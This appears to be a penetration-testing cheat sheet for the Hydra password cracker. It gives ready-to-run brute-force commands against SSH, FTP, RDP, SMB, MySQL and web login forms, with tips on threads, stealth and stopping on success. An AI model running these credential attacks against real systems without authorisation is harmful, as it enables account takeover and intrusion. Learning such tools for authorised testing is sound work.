Hydra Command List
Hydra Command Guide
Hydra is a legendary parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, allowing researchers to demonstrate the risk of weak credentials.
Top 10 Useful Commands
1. Basic SSH Crack
hydra -l fulluser -P passlist.txt ssh://192.168.1.1
Explanation: Attacks SSH using a known username (-l) and a password list (-P).
2. User & Pass List (Unknown Creds)
hydra -L userlist.txt -P passlist.txt ftp://192.168.1.1
Explanation: Tries every combination of username (-L) and password against an FTP server.
3. HTTP Post Form Crack
hydra -l admin -P passlist.txt 10.10.10.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Login failed"
Explanation: Cracks web logins. You specify the path, the body parameters (replacing user/pass with placeholders), and the Failure string (F=).
4. RDP Cracking
hydra -l Administrator -P passlist.txt rdp://192.168.1.1
Explanation: Targets Remote Desktop Protocol. Note: RDP can be slow and lock accounts quickly.
5. SMB (Windows) Cracking
hydra -L userlist.txt -P passlist.txt smb://192.168.1.1
Explanation: Attacks Windows file sharing (SMB). Useful for initial Active Directory access.
6. Show Attempts (Debug)
hydra -V -l user -P pass.txt ssh://target
Explanation: Verbose mode (-V). Shows every login attempt (user:pass combination). Good for checking progress.
7. Limit Threads (Stealth/Stability)
hydra -t 4 -l user -P pass.txt ssh://target
Explanation: Limits concurrent tasks to 4. Essential for older services (like Telnet) that crash under load.
8. Exit on Success
hydra -f -l user -P pass.txt ssh://target
Explanation: Stops the entire scan as soon as ONE valid password is found (-f). Saves time.
9. MySQL Cracking
hydra -l root -P pass.txt mysql://192.168.1.1
Explanation: Direct brute-force against a backend database port (3306).
10. Save Output
hydra -l user -P pass.txt ssh://target -o found.txt
Explanation: Saves found credentials to a file.
The Most Powerful Command
The most effective way to use Hydra against a web form (the most common modern use case):
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.5 http-post-form "/admin/login.php:username=^USER^&password=^PASS^&Login=Login:F=Invalid username" -t 64 -f -V
Why it's powerful:
* Targeted Protocol: Precise targeting of a specific web form.
* Fast: Uses 64 threads (-t 64).
* Efficiency: Stops on first success (-f).
* Verification: Verbose output (-V) lets you verify the error string logic is working.